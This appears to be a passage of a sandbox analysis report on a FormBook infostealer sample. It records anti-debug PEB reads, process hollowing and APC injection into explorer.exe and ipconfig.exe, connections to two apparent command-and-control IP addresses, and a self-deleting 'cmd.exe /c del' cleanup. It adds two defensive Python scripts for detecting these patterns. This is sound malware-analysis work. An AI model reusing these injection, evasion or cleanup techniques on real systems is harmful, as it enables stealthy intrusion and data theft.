Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034FFF10 mov eax, dword ptr fs:[00000030h] 4_2_034FFF10
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034FFF10 mov eax, dword ptr fs:[00000030h] 4_2_034FFF10
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03464F2E mov eax, dword ptr fs:[00000030h] 4_2_03464F2E
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03464F2E mov eax, dword ptr fs:[00000030h] 4_2_03464F2E
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0349E730 mov eax, dword ptr fs:[00000030h] 4_2_0349E730
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A37F5 mov eax, dword ptr fs:[00000030h] 4_2_034A37F5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03478794 mov eax, dword ptr fs:[00000030h] 4_2_03478794
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034E7794 mov eax, dword ptr fs:[00000030h] 4_2_034E7794
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034E7794 mov eax, dword ptr fs:[00000030h] 4_2_034E7794
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034E7794 mov eax, dword ptr fs:[00000030h] 4_2_034E7794
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03477E41 mov eax, dword ptr fs:[00000030h] 4_2_03477E41
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03477E41 mov eax, dword ptr fs:[00000030h] 4_2_03477E41
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03477E41 mov eax, dword ptr fs:[00000030h] 4_2_03477E41
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03477E41 mov eax, dword ptr fs:[00000030h] 4_2_03477E41
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03477E41 mov eax, dword ptr fs:[00000030h] 4_2_03477E41
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03477E41 mov eax, dword ptr fs:[00000030h] 4_2_03477E41
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0352AE44 mov eax, dword ptr fs:[00000030h] 4_2_0352AE44
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0352AE44 mov eax, dword ptr fs:[00000030h] 4_2_0352AE44
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0347766D mov eax, dword ptr fs:[00000030h] 4_2_0347766D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0348AE73 mov eax, dword ptr fs:[00000030h] 4_2_0348AE73
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0348AE73 mov eax, dword ptr fs:[00000030h] 4_2_0348AE73
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0348AE73 mov eax, dword ptr fs:[00000030h] 4_2_0348AE73
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0348AE73 mov eax, dword ptr fs:[00000030h] 4_2_0348AE73
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0348AE73 mov eax, dword ptr fs:[00000030h] 4_2_0348AE73
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0346C600 mov eax, dword ptr fs:[00000030h] 4_2_0346C600
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0346C600 mov eax, dword ptr fs:[00000030h] 4_2_0346C600
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0346C600 mov eax, dword ptr fs:[00000030h] 4_2_0346C600
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03498E00 mov eax, dword ptr fs:[00000030h] 4_2_03498E00
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0349A61C mov eax, dword ptr fs:[00000030h] 4_2_0349A61C
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0349A61C mov eax, dword ptr fs:[00000030h] 4_2_0349A61C
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03521608 mov eax, dword ptr fs:[00000030h] 4_2_03521608
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0346E620 mov eax, dword ptr fs:[00000030h] 4_2_0346E620
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0351FE3F mov eax, dword ptr fs:[00000030h] 4_2_0351FE3F
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03538ED6 mov eax, dword ptr fs:[00000030h] 4_2_03538ED6
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034936CC mov eax, dword ptr fs:[00000030h] 4_2_034936CC
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A8EC7 mov eax, dword ptr fs:[00000030h] 4_2_034A8EC7
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0351FEC0 mov eax, dword ptr fs:[00000030h] 4_2_0351FEC0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034776E2 mov eax, dword ptr fs:[00000030h] 4_2_034776E2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034916E0 mov ecx, dword ptr fs:[00000030h] 4_2_034916E0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034FFE87 mov eax, dword ptr fs:[00000030h] 4_2_034FFE87
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034E46A7 mov eax, dword ptr fs:[00000030h] 4_2_034E46A7
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03530EA5 mov eax, dword ptr fs:[00000030h] 4_2_03530EA5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03530EA5 mov eax, dword ptr fs:[00000030h] 4_2_03530EA5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03530EA5 mov eax, dword ptr fs:[00000030h] 4_2_03530EA5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A3D43 mov eax, dword ptr fs:[00000030h] 4_2_034A3D43
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034E3540 mov eax, dword ptr fs:[00000030h] 4_2_034E3540
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03487D50 mov eax, dword ptr fs:[00000030h] 4_2_03487D50
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0348C577 mov eax, dword ptr fs:[00000030h] 4_2_0348C577
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0348C577 mov eax, dword ptr fs:[00000030h] 4_2_0348C577
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03538D34 mov eax, dword ptr fs:[00000030h] 4_2_03538D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0352E539 mov eax, dword ptr fs:[00000030h] 4_2_0352E539
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03494D3B mov eax, dword ptr fs:[00000030h] 4_2_03494D3B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03494D3B mov eax, dword ptr fs:[00000030h] 4_2_03494D3B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03494D3B mov eax, dword ptr fs:[00000030h] 4_2_03494D3B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h] 4_2_03473D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h] 4_2_03473D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h] 4_2_03473D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h] 4_2_03473D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h] 4_2_03473D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h] 4_2_03473D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h] 4_2_03473D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h] 4_2_03473D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h] 4_2_03473D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h] 4_2_03473D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h] 4_2_03473D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h] 4_2_03473D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03473D34 mov eax, dword ptr fs:[00000030h] 4_2_03473D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0346AD30 mov eax, dword ptr fs:[00000030h] 4_2_0346AD30
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034EA537 mov eax, dword ptr fs:[00000030h] 4_2_034EA537
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034E6DC9 mov eax, dword ptr fs:[00000030h] 4_2_034E6DC9
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034E6DC9 mov eax, dword ptr fs:[00000030h] 4_2_034E6DC9
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034E6DC9 mov eax, dword ptr fs:[00000030h] 4_2_034E6DC9
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034E6DC9 mov ecx, dword ptr fs:[00000030h] 4_2_034E6DC9
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034E6DC9 mov eax, dword ptr fs:[00000030h] 4_2_034E6DC9
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034E6DC9 mov eax, dword ptr fs:[00000030h] 4_2_034E6DC9
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03518DF1 mov eax, dword ptr fs:[00000030h] 4_2_03518DF1
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0347D5E0 mov eax, dword ptr fs:[00000030h] 4_2_0347D5E0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0347D5E0 mov eax, dword ptr fs:[00000030h] 4_2_0347D5E0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0352FDE2 mov eax, dword ptr fs:[00000030h] 4_2_0352FDE2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0352FDE2 mov eax, dword ptr fs:[00000030h] 4_2_0352FDE2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0352FDE2 mov eax, dword ptr fs:[00000030h] 4_2_0352FDE2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0352FDE2 mov eax, dword ptr fs:[00000030h] 4_2_0352FDE2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03492581 mov eax, dword ptr fs:[00000030h] 4_2_03492581
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03492581 mov eax, dword ptr fs:[00000030h] 4_2_03492581
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03492581 mov eax, dword ptr fs:[00000030h] 4_2_03492581
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03492581 mov eax, dword ptr fs:[00000030h] 4_2_03492581
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03462D8A mov eax, dword ptr fs:[00000030h] 4_2_03462D8A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03462D8A mov eax, dword ptr fs:[00000030h] 4_2_03462D8A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03462D8A mov eax, dword ptr fs:[00000030h] 4_2_03462D8A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03462D8A mov eax, dword ptr fs:[00000030h] 4_2_03462D8A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03462D8A mov eax, dword ptr fs:[00000030h] 4_2_03462D8A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0349FD9B mov eax, dword ptr fs:[00000030h] 4_2_0349FD9B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0349FD9B mov eax, dword ptr fs:[00000030h] 4_2_0349FD9B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034935A1 mov eax, dword ptr fs:[00000030h] 4_2_034935A1
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03491DB5 mov eax, dword ptr fs:[00000030h] 4_2_03491DB5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03491DB5 mov eax, dword ptr fs:[00000030h] 4_2_03491DB5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_03491DB5 mov eax, dword ptr fs:[00000030h] 4_2_03491DB5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_035305AC mov eax, dword ptr fs:[00000030h] 4_2_035305AC
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_035305AC mov eax, dword ptr fs:[00000030h] 4_2_035305AC
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_0349A44B mov eax, dword ptr fs:[00000030h] 4_2_0349A44B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034FC450 mov eax, dword ptr fs:[00000030h] 4_2_034FC450
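Every line above is the same idiom: on 32-bit Windows the fs segment points at the TEB, and TEB+0x30 holds the pointer to the PEB, so `mov eax, dword ptr fs:[00000030h]` is the first instruction of almost every inline anti-debug check (PEB.BeingDebugged, PEB.NtGlobalFlag, heap flags) and of manual import resolution via PEB.Ldr. The scanner below is an added example, not code from the sample or the sandbox: it finds both encodings of that read in raw x86 code, names the destination register, and, when the next instruction dereferences the freshly loaded PEB pointer, reports which PEB field is being checked. The input buffer is constructed for the example; it is not a dump of mscorsvw.exe or ipconfig.exe from this analysis.

```python
"""Locate reads of the 32-bit PEB pointer (fs:[0x30]) in raw x86 code.

Added example for this report; not code from the sample or the sandbox.
SAMPLE_CODE is constructed, not bytes taken from PT300975-inv.exe.
"""
import re
from typing import List, Optional, Tuple

# 32-bit general-purpose registers indexed by the ModRM reg/rm field.
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# On 32-bit Windows, fs points at the TEB and TEB+0x30 holds the PEB pointer.
PEB_DISP = b"\x30\x00\x00\x00"

# Two encodings produce the report's 'mov r32, dword ptr fs:[00000030h]':
#   64 A1 30 00 00 00     mov eax, fs:[0x30]   (moffs32 short form, eax only)
#   64 8B /r 30 00 00 00  mov r32, fs:[0x30]   (ModRM mod=00 rm=101 => disp32)
# The ModRM byte of the second form is 0x05 | (reg << 3).
_PEB_READ = re.compile(
    rb"\x64(?:\xA1" + PEB_DISP
    + rb"|\x8B([\x05\x0D\x15\x1D\x25\x2D\x35\x3D])" + PEB_DISP + rb")"
)

# PEB fields that anti-analysis code typically dereferences right after the read.
_PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x18: "ProcessHeap", 0x68: "NtGlobalFlag"}


def _classify_followup(code: bytes, pos: int, base: int) -> Optional[str]:
    """Name the PEB field if the instruction at `pos` reads [base+disp8]."""
    if base == 4:  # esp as a base needs a SIB byte; never used for this idiom
        return None
    # movzx r32, byte ptr [base+disp8]: 0F B6 /r with mod=01, rm=base
    if code[pos:pos + 2] == b"\x0F\xB6" and len(code) >= pos + 4:
        modrm, disp = code[pos + 2], code[pos + 3]
        if (modrm & 0xC7) == (0x40 | base):
            return _PEB_FIELDS.get(disp)
    # mov r32, dword ptr [base+disp8]: 8B /r with mod=01, rm=base
    if code[pos:pos + 1] == b"\x8B" and len(code) >= pos + 3:
        modrm, disp = code[pos + 1], code[pos + 2]
        if (modrm & 0xC7) == (0x40 | base):
            return _PEB_FIELDS.get(disp)
    return None


def find_peb_reads(code: bytes) -> List[Tuple[int, str, Optional[str]]]:
    """Return (offset, destination register, PEB field or None) per fs:[0x30] read."""
    hits = []
    for m in _PEB_READ.finditer(code):
        modrm = m.group(1)
        reg = 0 if modrm is None else (modrm[0] >> 3) & 7  # A1 form always targets eax
        hits.append((m.start(), REG32[reg], _classify_followup(code, m.end(), reg)))
    return hits


# Constructed buffer: an inline IsDebuggerPresent, an NtGlobalFlag check via ecx,
# and a bare read whose purpose is not visible in the next instruction.
SAMPLE_CODE = bytes.fromhex(
    "64A130000000"    # mov eax, fs:[0x30]
    "0FB64002"        # movzx eax, byte ptr [eax+2]    ; PEB.BeingDebugged
    "85C0"            # test eax, eax
    "7504"            # jnz short +4
    "90909090"        # nop x4
    "648B0D30000000"  # mov ecx, fs:[0x30]
    "8B4168"          # mov eax, dword ptr [ecx+0x68]  ; PEB.NtGlobalFlag
    "C3"              # ret
    "648B1530000000"  # mov edx, fs:[0x30]
    "C3"              # ret
)

if __name__ == "__main__":
    for off, reg, field in find_peb_reads(SAMPLE_CODE):
        print(f"+0x{off:04x}: mov {reg}, fs:[0x30]  ->  {field or 'unclassified'}")
```

Run it over a memory region dumped from one of the injected processes and the offsets it prints line up with the function addresses the sandbox lists; a hit followed by a BeingDebugged or NtGlobalFlag dereference is an anti-debug check, while one followed by a PEB.Ldr walk is import resolution and is worth patching out before stepping through the payload in a debugger. The byte patterns are 32-bit only; the same checks in 64-bit code read gs:[0x60].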
Enables debug privileges
Source: C:\Users\user\Desktop\PT300975-inv.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\ipconfig.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\PT300975-inv.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 156.241.53.196 80
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.244 80
Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Thread register set: target process: 3440
Source: C:\Windows\SysWOW64\ipconfig.exe Thread register set: target process: 3440
Queues an APC in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: E30000
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\PT300975-inv.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe'
Source: explorer.exe, 00000003.00000000.359794599.0000000004F80000.00000004.00000001.sdmp, ipconfig.exe, 00000004.00000002.605713889.00000000046D0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.605084238.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000004.00000002.605713889.00000000046D0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000003.00000002.605084238.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000004.00000002.605713889.00000000046D0000.00000002.00000001.sdmp Binary or memory string: &Program Manager
Source: explorer.exe, 00000003.00000002.605084238.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000004.00000002.605713889.00000000046D0000.00000002.00000001.sdmp Binary or memory string: Progmanlock
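The injection chain recorded above (a suspended mscorsvw.exe started from the Desktop sample, RWX sections mapped into explorer.exe and ipconfig.exe, an APC queued into explorer.exe, a section unmapped from ipconfig.exe, and finally cmd.exe /c del) can be reconstructed mechanically from the report's own "Source: ..." lines. The Python below is an added example, not part of the sandbox report and not the sample's code; it parses a constructed subset of the lines above (the "Jump to behavior" link text removed) into events, orders the processes by creation and injection edges, and flags the injection primitives an analyst looks for. The heuristics (an RWX section into another process as injection, unmap plus RWX map of the same target as hollowing, a user-directory binary spawning a Framework binary, cmd.exe del as cleanup) and the assumption that image paths contain no spaces are the author's, not the sandbox's.

```python
import re
from collections import defaultdict

# Constructed subset of this report's own behavior lines (link text removed).
REPORT_LINES = [
    r"Source: C:\Users\user\Desktop\PT300975-inv.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Thread APC queued: target process: C:\Windows\explorer.exe",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: E30000",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Thread register set: target process: 3440",
    r"Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write",
    r"Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe'",
]

LINE_RE = re.compile(
    r"^Source: (?P<src>\S+) "
    r"(?P<event>Process created|Section loaded|Section unmapped|Thread APC queued|Thread register set): "
    r"(?P<rest>.*)$"
)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse_report(lines):
    """Turn 'Source: <image> <event>: <details>' lines into event records.
    Assumption: image paths contain no spaces, as they do in this report."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.replace(" Jump to behavior", "").strip())
        if not m:
            continue
        src, event, rest = m.group("src"), m.group("event"), m.group("rest")
        if event == "Process created":
            target, _, detail = rest.partition(" ")        # image path, then command line
        elif event == "Section loaded":
            mm = re.search(r"target: (\S+) protection: (.*)$", rest)
            target, detail = (mm.group(1), mm.group(2)) if mm else ("", "")
        elif event == "Section unmapped":
            mm = re.match(r"(\S+) base address: (\S+)", rest)
            target, detail = (mm.group(1), mm.group(2)) if mm else ("", "")
        else:                                                # APC queued / thread register set
            mm = re.search(r"target process: (\S+)", rest)
            target, detail = (mm.group(1), "") if mm else ("", "")
        if target:
            events.append({"src": src, "event": event, "target": target, "detail": detail})
    return events


def execution_chain(events):
    """Order processes by following creation and injection edges from the root (the sample).
    Numeric targets (PIDs the report did not resolve to an image) are skipped."""
    children = defaultdict(list)
    for e in events:
        if e["target"].isdigit():
            continue
        if e["target"] not in children[e["src"]]:
            children[e["src"]].append(e["target"])
    targets = {t for ts in children.values() for t in ts}
    roots = [s for s in children if s not in targets]
    chain = []

    def walk(node):
        if node in chain:
            return
        chain.append(node)
        for child in children.get(node, []):
            walk(child)

    for root in roots:
        walk(root)
    return [basename(p) for p in chain]


def findings(events):
    """Flag the injection primitives: cross-process RWX mapping, APC queueing, thread
    context changes, unmap+RWX map (hollowing), and the cmd.exe del cleanup."""
    out = set()
    per_target = defaultdict(set)
    for e in events:
        src, tgt, detail = e["src"], e["target"], e["detail"].lower()
        if e["event"] == "Process created":
            if src.lower().startswith("c:\\users\\") and tgt.lower().startswith("c:\\windows\\"):
                out.add("user-dir binary launched a Windows binary: " + basename(tgt))
            if "/c del" in detail:
                out.add("self-cleanup via cmd.exe del from " + basename(src))
        elif e["event"] == "Section loaded":
            # "read write" alone (ipconfig.exe -> explorer.exe) is data, not code: not flagged here.
            if "execute" in detail and "write" in detail and src != tgt:
                out.add("RWX section mapped into %s by %s" % (basename(tgt), basename(src)))
                per_target[(src, tgt)].add("rwx")
        elif e["event"] == "Section unmapped":
            per_target[(src, tgt)].add("unmap")
        elif e["event"] == "Thread APC queued":
            out.add("APC queued into %s by %s" % (basename(tgt), basename(src)))
        elif e["event"] == "Thread register set":
            out.add("thread context modified in %s by %s" % (basename(tgt), basename(src)))
    for (src, tgt), kinds in per_target.items():
        if {"rwx", "unmap"} <= kinds:
            out.add("process hollowing of %s by %s" % (basename(tgt), basename(src)))
    return sorted(out)


if __name__ == "__main__":
    evs = parse_report(REPORT_LINES)
    print(" -> ".join(execution_chain(evs)))
    for f in findings(evs):
        print("-", f)
```

The hollowing finding only fires when the same source both unmaps a section from a target and maps an RWX section into it, which is the pairing the report shows for ipconfig.exe; the RW-only mapping from ipconfig.exe into explorer.exe is deliberately left out so that plain shared-memory use does not produce an injection alert on its own.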

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\PT300975-inv.exe Queries volume information: C:\Users\user\Desktop\PT300975-inv.exe VolumeInformation
Source: C:\Users\user\Desktop\PT300975-inv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\PT300975-inv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\PT300975-inv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\PT300975-inv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Users\user\Desktop\PT300975-inv.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPE

Behavior Graph (ID 323028, sample PT300975-inv.exe, start date 26/11/2020, architecture WINDOWS, score 100)

Top-level signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected FormBook; 4 other signatures. DNS lookup at the top level: g.msn.com.

